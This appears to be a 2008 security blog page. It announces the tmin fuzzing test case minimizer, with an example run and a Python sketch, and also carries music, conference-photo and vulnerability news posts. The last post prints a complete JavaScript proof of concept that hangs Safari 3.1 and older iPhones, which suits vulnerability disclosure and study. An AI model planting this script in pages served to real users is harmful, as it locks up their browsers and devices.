Tmin fuzzing test case optimizer released

Tmin is a quick and simple tool to minimize the size and syntax of complex test cases in automated security testing.

The tool is somewhat related to delta, a more featured general-purpose optimizer, but tmin is meant specifically for dealing with unknown or complex data formats (without the need to tokenize and re-serialize test cases), for hands-off detection of security fault conditions, and for easy integration with UI testing harnesses.

tmin is also capable of reducing the complexity of the alphabet used in datasets that cannot be trimmed down any further in size.

Below is an example run of tmin:

$ cat testcase.in
This is a lengthy and annoying hello world testcase.

$ cat testme.sh
#!/bin/bash

grep "el..*wo" || exit 0
exit 1

$ ../tmin -x ./testme.sh
tmin - complex testcase minimizer, version 0.03-beta (lcamtuf@google.com)
[*] Stage 0: loading 'testcase.in' and validating fault condition...
[*] Stage 1: recursive truncation (round 1, input = 53/53)
[*] Stage 1: recursive truncation (round 2, input = 27/53)
[*] Stage 1: recursive truncation (round 3, input = 14/53)
[*] Stage 1: recursive truncation (round 4, input = 10/53)
[*] Stage 1: recursive truncation (round 5, input = 8/53)
[*] Stage 1: recursive truncation (round 6, input = 7/53)
[*] Stage 2: block skipping (round 1, input = 7/53)
[*] Stage 2: block skipping (round 2, input = 6/53)
[*] Stage 2: block skipping (round 3, input = 5/53)
[*] Stage 3: alphabet normalization (round 1, charset = 5/5)
[*] Stage 3: alphabet normalization (round 2, charset = 5/5)
[*] Stage 4: character normalization (round 1, characters = 4/5)
[*] All done - writing output to 'testcase.small'...

== Final statistics==
Original size : 53 bytes
Optimized size : 5 bytes (-90.57%)
Chars replaced : 1 (1.89%)
Efficiency : 9 good / 49 bad
Round counts : 1:6 2:3 3:2 4:1

$ cat testcase.small
el0wo

Download:
http://code.google.com/p/tmin

Usage:
http://code.google.com/p/tmin/wiki/TminManual
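As an added illustration (not tmin's own code; tmin is written in C and its stage heuristics differ in detail), the Python sketch below walks through the same idea the run above shows: a fault predicate standing in for testme.sh (here a regex search for "el..*wo", assumed to be equivalent to the grep call), tail truncation, block skipping, and replacing surviving bytes with '0'. Fed the page's 53-byte testcase it returns the same five-byte b'el0wo'.

```python
import re

# Constructed stand-in for the page's testme.sh: the "fault condition" is
# grep's pattern "el..*wo" matching the candidate, nothing else.
FAULT = re.compile(rb"el..*wo")

def fault_holds(data: bytes) -> bool:
    return FAULT.search(data) is not None

def truncate(data: bytes, check) -> bytes:
    """Stage 1 analogue: cut the tail in halving steps while the fault survives."""
    step = len(data) // 2
    while step >= 1:
        while len(data) > step and check(data[:-step]):
            data = data[:-step]
        step //= 2
    return data

def skip_blocks(data: bytes, check) -> bytes:
    """Stage 2 analogue: try deleting each block of a given size, halving the size per round."""
    size = max(len(data) // 2, 1)
    while size >= 1:
        pos = 0
        while pos < len(data):
            candidate = data[:pos] + data[pos + size:]
            if candidate and check(candidate):
                data = candidate          # block was dead weight; retry at the same offset
            else:
                pos += size
        size //= 2
    return data

def normalize_chars(data: bytes, check, fill: int = ord("0")) -> bytes:
    """Stage 4 analogue: replace each byte with '0' wherever the fault still reproduces."""
    out = bytearray(data)
    for i in range(len(out)):
        if out[i] != fill:
            saved, out[i] = out[i], fill
            if not check(bytes(out)):
                out[i] = saved
    return bytes(out)

def minimize(data: bytes, check=fault_holds) -> bytes:
    """Run the stages in order; refuse inputs that never reproduce the fault (tmin's stage 0)."""
    if not check(data):
        raise ValueError("fault condition does not reproduce on the original input")
    data = truncate(data, check)
    data = skip_blocks(data, check)
    return normalize_chars(data, check)
```

Swap `fault_holds` for a function that runs the real target and inspects its exit status or signal, and the same loop minimizes arbitrary binary input against a crash rather than a regex.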


NiN Gives Away Full Length Album - The Slip

Nine Inch Nails is giving away their new album, entitled The Slip, for free, exclusively from NiN.com. The album is available in a variety of formats, including high-quality MP3, FLAC and/or M4A lossless at CD quality, and even higher-than-CD-quality 24/96 WAVE.

Click on the link below to get your copy:

http://dl.nin.com/theslip/signup


Fortify: The New Face of Cybercrime


CanSecWest 2008 Photos

I finally got around to posting the shots I took while I was in Vancouver, British Columbia for CanSecWest 2008. This was my first time going to CanSecWest and I must say it was a great conference. It doesn’t have all of that hype and BS like BlackHat does. I'll definitely be going next year.

CanSecWest 2008 - Vancouver, BC

Full photo set here:
http://flickr.com/photos/tomferris/sets/72157604376917452/


Safari 3.1 JavaScript DoS Released

Georgi Guninski has discovered a denial of service vulnerability in Safari 3.1 which causes the browser to hang rather than crash. This DoS also affects iPhones running firmware version 1.1.4 and all earlier versions.

When visiting a site with the malformed JavaScript, the iPhone locks up, forcing the user to reboot the phone. The current workaround is to disable JavaScript on your iPhone and/or iPod touch.

Below is the source of the PoC, which triggers the hang (not a crash).

Copyright Georgi Guninski

Cannot be used in vulnerability databases

Especially securityfocus/mitre/cve/cert
<script>
var s=String.fromCharCode(257);
var ki="";
var me="";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;

alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
</script>
